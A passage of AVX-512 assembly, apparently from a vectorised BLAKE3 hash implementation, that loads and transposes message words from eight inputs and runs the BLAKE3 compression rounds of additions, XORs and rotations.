vpermt2d zmm17, zmm27, zmm30
vpermt2d zmm21, zmm31, zmm30
vshufps zmm18, zmm9, zmm11, 136
vshufps zmm8, zmm13, zmm15, 136
vmovdqa32 zmm22, zmm18
vpermt2d zmm18, zmm27, zmm8
vpermt2d zmm22, zmm31, zmm8
vshufps zmm19, zmm9, zmm11, 221
vshufps zmm8, zmm13, zmm15, 221
vmovdqa32 zmm23, zmm19
vpermt2d zmm19, zmm27, zmm8
vpermt2d zmm23, zmm31, zmm8
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov r12, qword ptr [rdi+0x40]
mov r13, qword ptr [rdi+0x48]
mov r14, qword ptr [rdi+0x50]
mov r15, qword ptr [rdi+0x58]
vmovdqu32 ymm24, ymmword ptr [r8+rdx-0x1*0x20]
vinserti64x4 zmm24, zmm24, ymmword ptr [r12+rdx-0x1*0x20], 0x01
vmovdqu32 ymm25, ymmword ptr [r9+rdx-0x1*0x20]
vinserti64x4 zmm25, zmm25, ymmword ptr [r13+rdx-0x1*0x20], 0x01
vpunpcklqdq zmm8, zmm24, zmm25
vpunpckhqdq zmm9, zmm24, zmm25
vmovdqu32 ymm24, ymmword ptr [r10+rdx-0x1*0x20]
vinserti64x4 zmm24, zmm24, ymmword ptr [r14+rdx-0x1*0x20], 0x01
vmovdqu32 ymm25, ymmword ptr [r11+rdx-0x1*0x20]
vinserti64x4 zmm25, zmm25, ymmword ptr [r15+rdx-0x1*0x20], 0x01
vpunpcklqdq zmm10, zmm24, zmm25
vpunpckhqdq zmm11, zmm24, zmm25
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r12+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r13+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r14+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
prefetcht0 [r15+rdx+0x80]
mov r8, qword ptr [rdi+0x20]
mov r9, qword ptr [rdi+0x28]
mov r10, qword ptr [rdi+0x30]
mov r11, qword ptr [rdi+0x38]
mov r12, qword ptr [rdi+0x60]
mov r13, qword ptr [rdi+0x68]
mov r14, qword ptr [rdi+0x70]
mov r15, qword ptr [rdi+0x78]
vmovdqu32 ymm24, ymmword ptr [r8+rdx-0x1*0x20]
vinserti64x4 zmm24, zmm24, ymmword ptr [r12+rdx-0x1*0x20], 0x01
vmovdqu32 ymm25, ymmword ptr [r9+rdx-0x1*0x20]
vinserti64x4 zmm25, zmm25, ymmword ptr [r13+rdx-0x1*0x20], 0x01
vpunpcklqdq zmm12, zmm24, zmm25
vpunpckhqdq zmm13, zmm24, zmm25
vmovdqu32 ymm24, ymmword ptr [r10+rdx-0x1*0x20]
vinserti64x4 zmm24, zmm24, ymmword ptr [r14+rdx-0x1*0x20], 0x01
vmovdqu32 ymm25, ymmword ptr [r11+rdx-0x1*0x20]
vinserti64x4 zmm25, zmm25, ymmword ptr [r15+rdx-0x1*0x20], 0x01
vpunpcklqdq zmm14, zmm24, zmm25
vpunpckhqdq zmm15, zmm24, zmm25
prefetcht0 [r8+rdx+0x80]
prefetcht0 [r12+rdx+0x80]
prefetcht0 [r9+rdx+0x80]
prefetcht0 [r13+rdx+0x80]
prefetcht0 [r10+rdx+0x80]
prefetcht0 [r14+rdx+0x80]
prefetcht0 [r11+rdx+0x80]
prefetcht0 [r15+rdx+0x80]
vshufps zmm24, zmm8, zmm10, 136
vshufps zmm30, zmm12, zmm14, 136
vmovdqa32 zmm28, zmm24
vpermt2d zmm24, zmm27, zmm30
vpermt2d zmm28, zmm31, zmm30
vshufps zmm25, zmm8, zmm10, 221
vshufps zmm30, zmm12, zmm14, 221
vmovdqa32 zmm29, zmm25
vpermt2d zmm25, zmm27, zmm30
vpermt2d zmm29, zmm31, zmm30
vshufps zmm26, zmm9, zmm11, 136
vshufps zmm8, zmm13, zmm15, 136
vmovdqa32 zmm30, zmm26
vpermt2d zmm26, zmm27, zmm8
vpermt2d zmm30, zmm31, zmm8
vshufps zmm8, zmm9, zmm11, 221
vshufps zmm10, zmm13, zmm15, 221
vpermi2d zmm27, zmm8, zmm10
vpermi2d zmm31, zmm8, zmm10
vpbroadcastd zmm8, dword ptr [BLAKE3_IV_0+rip]
vpbroadcastd zmm9, dword ptr [BLAKE3_IV_1+rip]
vpbroadcastd zmm10, dword ptr [BLAKE3_IV_2+rip]
vpbroadcastd zmm11, dword ptr [BLAKE3_IV_3+rip]
vmovdqa32 zmm12, zmmword ptr [rsp]
vmovdqa32 zmm13, zmmword ptr [rsp+0x1*0x40]
vpbroadcastd zmm14, dword ptr [BLAKE3_BLOCK_LEN+rip]
vpbroadcastd zmm15, dword ptr [rsp+0x22*0x4]
vpaddd zmm0, zmm0, zmm16
vpaddd zmm1, zmm1, zmm18
vpaddd zmm2, zmm2, zmm20
vpaddd zmm3, zmm3, zmm22
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm17
vpaddd zmm1, zmm1, zmm19
vpaddd zmm2, zmm2, zmm21
vpaddd zmm3, zmm3, zmm23
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm24
vpaddd zmm1, zmm1, zmm26
vpaddd zmm2, zmm2, zmm28
vpaddd zmm3, zmm3, zmm30
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm25
vpaddd zmm1, zmm1, zmm27
vpaddd zmm2, zmm2, zmm29
vpaddd zmm3, zmm3, zmm31
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm18
vpaddd zmm1, zmm1, zmm19
vpaddd zmm2, zmm2, zmm23
vpaddd zmm3, zmm3, zmm20
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm22
vpaddd zmm1, zmm1, zmm26
vpaddd zmm2, zmm2, zmm16
vpaddd zmm3, zmm3, zmm29
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm17
vpaddd zmm1, zmm1, zmm28
vpaddd zmm2, zmm2, zmm25
vpaddd zmm3, zmm3, zmm31
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm27
vpaddd zmm1, zmm1, zmm21
vpaddd zmm2, zmm2, zmm30
vpaddd zmm3, zmm3, zmm24
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm19
vpaddd zmm1, zmm1, zmm26
vpaddd zmm2, zmm2, zmm29
vpaddd zmm3, zmm3, zmm23
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm20
vpaddd zmm1, zmm1, zmm28
vpaddd zmm2, zmm2, zmm18
vpaddd zmm3, zmm3, zmm30
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm22
vpaddd zmm1, zmm1, zmm25
vpaddd zmm2, zmm2, zmm27
vpaddd zmm3, zmm3, zmm24
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm21
vpaddd zmm1, zmm1, zmm16
vpaddd zmm2, zmm2, zmm31
vpaddd zmm3, zmm3, zmm17
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm26
vpaddd zmm1, zmm1, zmm28
vpaddd zmm2, zmm2, zmm30
vpaddd zmm3, zmm3, zmm29
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm23
vpaddd zmm1, zmm1, zmm25
vpaddd zmm2, zmm2, zmm19
vpaddd zmm3, zmm3, zmm31
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm20
vpaddd zmm1, zmm1, zmm27
vpaddd zmm2, zmm2, zmm21
vpaddd zmm3, zmm3, zmm17
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm16
vpaddd zmm1, zmm1, zmm18
vpaddd zmm2, zmm2, zmm24
vpaddd zmm3, zmm3, zmm22
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm28
vpaddd zmm1, zmm1, zmm25
vpaddd zmm2, zmm2, zmm31
vpaddd zmm3, zmm3, zmm30
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm29
vpaddd zmm1, zmm1, zmm27
vpaddd zmm2, zmm2, zmm26
vpaddd zmm3, zmm3, zmm24
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm23
vpaddd zmm1, zmm1, zmm21
vpaddd zmm2, zmm2, zmm16
vpaddd zmm3, zmm3, zmm22
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm18
vpaddd zmm1, zmm1, zmm19
vpaddd zmm2, zmm2, zmm17
vpaddd zmm3, zmm3, zmm20
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm25
vpaddd zmm1, zmm1, zmm27
vpaddd zmm2, zmm2, zmm24
vpaddd zmm3, zmm3, zmm31
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vprord zmm15, zmm15, 16
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 12
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vpaddd zmm0, zmm0, zmm30
vpaddd zmm1, zmm1, zmm21
vpaddd zmm2, zmm2, zmm28
vpaddd zmm3, zmm3, zmm17
vpaddd zmm0, zmm0, zmm4
vpaddd zmm1, zmm1, zmm5
vpaddd zmm2, zmm2, zmm6
vpaddd zmm3, zmm3, zmm7
vpxord zmm12, zmm12, zmm0
vpxord zmm13, zmm13, zmm1
vpxord zmm14, zmm14, zmm2
vpxord zmm15, zmm15, zmm3
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vprord zmm15, zmm15, 8
vpaddd zmm8, zmm8, zmm12
vpaddd zmm9, zmm9, zmm13
vpaddd zmm10, zmm10, zmm14
vpaddd zmm11, zmm11, zmm15
vpxord zmm4, zmm4, zmm8
vpxord zmm5, zmm5, zmm9
vpxord zmm6, zmm6, zmm10
vpxord zmm7, zmm7, zmm11
vprord zmm4, zmm4, 7
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vpaddd zmm0, zmm0, zmm29
vpaddd zmm1, zmm1, zmm16
vpaddd zmm2, zmm2, zmm18
vpaddd zmm3, zmm3, zmm20
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 16
vprord zmm12, zmm12, 16
vprord zmm13, zmm13, 16
vprord zmm14, zmm14, 16
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 12
vprord zmm6, zmm6, 12
vprord zmm7, zmm7, 12
vprord zmm4, zmm4, 12
vpaddd zmm0, zmm0, zmm19
vpaddd zmm1, zmm1, zmm26
vpaddd zmm2, zmm2, zmm22
vpaddd zmm3, zmm3, zmm23
vpaddd zmm0, zmm0, zmm5
vpaddd zmm1, zmm1, zmm6
vpaddd zmm2, zmm2, zmm7
vpaddd zmm3, zmm3, zmm4
vpxord zmm15, zmm15, zmm0
vpxord zmm12, zmm12, zmm1
vpxord zmm13, zmm13, zmm2
vpxord zmm14, zmm14, zmm3
vprord zmm15, zmm15, 8
vprord zmm12, zmm12, 8
vprord zmm13, zmm13, 8
vprord zmm14, zmm14, 8
vpaddd zmm10, zmm10, zmm15
vpaddd zmm11, zmm11, zmm12
vpaddd zmm8, zmm8, zmm13
vpaddd zmm9, zmm9, zmm14
vpxord zmm5, zmm5, zmm10
vpxord zmm6, zmm6, zmm11
vpxord zmm7, zmm7, zmm8
vpxord zmm4, zmm4, zmm9
vprord zmm5, zmm5, 7
vprord zmm6, zmm6, 7
vprord zmm7, zmm7, 7
vprord zmm4, zmm4, 7
vpaddd zmm0, zmm0, zmm27
vpaddd zmm1, zmm1, zmm21
vpaddd zmm2, zmm2, zmm17
vpaddd zmm3, zmm3, zmm24
vpaddd zmm0, zmm0, zmm4
